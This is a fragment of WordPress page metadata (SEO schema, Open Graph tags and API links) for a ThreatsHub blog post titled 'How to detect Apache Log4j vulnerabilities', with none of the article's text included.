class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"How to detect Apache Log4j vulnerabilities\",\"datePublished\":\"2022-01-27T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/\"},\"wordCount\":1861,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/how-to-detect-apache-log4j-vulnerabilities.png\",\"keywords\":[\"Trend Micro DevOps : Article\",\"Trend Micro DevOps : Cloud Native\",\"Trend Micro DevOps : How To\",\"Trend Micro DevOps : Multi Cloud\",\"Trend Micro DevOps : Network Security\",\"Trend Micro DevOps : Workload Security\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/\",\"name\":\"How to detect Apache Log4j vulnerabilities 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/how-to-detect-apache-log4j-vulnerabilities.png\",\"datePublished\":\"2022-01-27T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/how-to-detect-apache-log4j-vulnerabilities.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/how-to-detect-apache-log4j-vulnerabilities.png\",\"width\":1424,\"height\":720},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-to-detect-apache-log4j-vulnerabilities\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro DevOps : Article\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-devops-article\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"How to detect Apache Log4j vulnerabilities\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to detect Apache Log4j vulnerabilities 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/","og_locale":"en_US","og_type":"article","og_title":"How to detect Apache Log4j vulnerabilities 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-01-27T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/thumb-how-to-apache.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"How to detect Apache Log4j vulnerabilities","datePublished":"2022-01-27T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/"},"wordCount":1861,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/01\/how-to-detect-apache-log4j-vulnerabilities.png","keywords":["Trend Micro DevOps : Article","Trend Micro DevOps : Cloud Native","Trend Micro DevOps : How To","Trend Micro DevOps : Multi Cloud","Trend Micro DevOps : Network Security","Trend Micro DevOps : Workload Security"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/","url":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/","name":"How to detect Apache Log4j vulnerabilities 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/01\/how-to-detect-apache-log4j-vulnerabilities.png","datePublished":"2022-01-27T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/01\/how-to-detect-apache-log4j-vulnerabilities.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/01\/how-to-detect-apache-log4j-vulnerabilities.png","width":1424,"height":720},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro DevOps : Article","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-devops-article\/"},{"@type":"ListItem","position":3,"name":"How to detect Apache Log4j vulnerabilities"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/45052","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=45052"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/45052\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/45053"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=45052"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=45052"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=45052"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}